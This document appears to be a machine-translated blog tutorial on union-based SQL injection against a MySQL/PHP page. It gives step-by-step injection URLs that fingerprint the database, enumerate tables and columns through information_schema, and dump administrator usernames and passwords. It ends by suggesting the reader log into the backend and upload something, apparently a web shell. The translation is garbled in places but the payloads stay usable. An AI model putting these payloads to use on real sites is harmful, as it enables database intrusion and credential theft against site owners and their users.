Let's take a look at the features of MySql versions.
Less than 4.0 does not support union queries
The default value of magic_quotes_gpc above 4.0 is on (magic_quotes_gpc = on
When magic_quotes_gpc in php. ini is On. All '(single quotation marks),' (double quotation marks), \ (backslash) and null characters in the submitted variables are automatically converted to escape characters containing the backslash. For example, 'will become \'. It brings a lot of obstacles to injection .)
More than 5.0 of statements can be violent, table, and column, supporting cross-Database
Step 1:
Exploitation of Injection Vulnerabilities and joint Query
Http: // localhost/list. php? Id = 600 order by 9 and 1 = 2 union select 1, 2, 3, 4, 5, 6, 7, 8, 9 the page shows numbers in some places, as to why there must be an and 1 = 2 error to display these numbers, I thought for myself, the first query has an error, the condition is that and 1 = 2 does not have a record that meets the condition, so the second query result after union is displayed.
Step 2:
Query valuable information such as database versions
Http: // localhost/list. php? Id = 600 order by 9 and 1 = 2 union select 1, version (), database (), 4, user (), 6, @ version_compile_ OS, 8, 9. Check which fields are displayed on the page. replace them. Has the version, database name, current user, and operating system come out? If we know that the database version is later than 5.0, we will launch a brute-force table or column. It's fast and you don't have to guess.
Step 3:
Violence table
And 1 = 2 union select group_concat (table_name) from information_schema.tables where table_schema = database name conversion hexadecimal.
I don't understand mysql statements. Let's look at the English. just guess what it means. Information_schema: MySql comes with many tables. table_schema literally refers to the set of tables. Then, this sentence is connected: list the table names from the "table set .. It seems that I will only explain this as follows: (for details about the usage of this function, I will give the address. Please refer to it!
To display the table name on the page. Combined with the joint query statement in step 2, construct: http: // localhost/list. php? Id = 600 order by 9 and 1 = 2 union select 1, group_concat (table_name), database (), 4, user (), 6, @ version_compile_ OS, 8, 9 from information_schema.tables where table_schema = the Database Name and table name converted to the hexadecimal format will be listed in the form. Believe in science. I don't deserve the picture.
Step 4:
Violent Field
And 1 = 2 union select group_concat (column_name) from information_schema.columns where table_name = convert table names in hexadecimal notation. You must also display the results on the page. Construction statement: http: // localhost/list. php? Id = 600 order by 9 and 1 = 2 union select 1, group_concat (column_name), database (), 4, user (), 6, @ version_compile_ OS, 8, 9 from information_schema.columns where table_name = convert the hexadecimal table name
Step 5:
Violent field content
Union select 1, group_concat (username, 0x3a, password), 3, 4, 5 from Table Name
Run the following statement: http: // localhost/list. php? Id = 600 order by 9 and 1 = 2 union select 1, group_concat (username, 0x3a, password), database (), 4, user (), 6, @ version_compile_ OS, 8, 9 from Table Name
Conclusion:
Now, I think you have got the Administrator's username and password, and then you can find the background, log in, and find a place to upload something.
Postscript:
Some knowledge points used in this article:
1. What is information_schema in MySQL? http://www.bkjia.com/database/201305/212034.html
2. group_concat () function Summary: http://www.bkjia.com/database/201305/212035.html